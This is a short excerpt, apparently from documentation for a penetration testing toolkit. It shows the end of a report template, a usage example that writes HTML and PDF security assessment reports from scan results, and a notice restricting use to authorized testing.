<p>{{ rec.description }}</p>
<p><strong>Priority:</strong> {{ rec.priority }}</p>
<p><strong>Implementation Effort:</strong> {{ rec.effort }}</p>
</div>
{% endfor %}
"""
# Usage example
if __name__ == "__main__":
generator = PegasusReportGenerator()
generator.load_scan_results('scan_results.json')
# Generate HTML report
html_report = generator.generate_full_report('html')
with open('security_assessment_report.html', 'w') as f:
f.write(html_report)
# Generate PDF report
pdf_report = generator.generate_full_report('pdf')
with open('security_assessment_report.pdf', 'wb') as f:
f.write(pdf_report)⚠️ Security Notice: Pegasus-Pentest-Arsenal is a comprehensive penetration testing toolkit that should only be used for authorized security testing activities. Always ensure you have explicit written permission before testing any systems or applications. The toolkit contains powerful exploitation capabilities that could cause system damage or data loss if misused. Use this tool responsibly and in accordance with applicable laws, regulations, and ethical guidelines. Always operate within the scope of authorized penetration testing engagements and follow responsible disclosure practices for any vulnerabilities discovered.
📚 Additional Resources: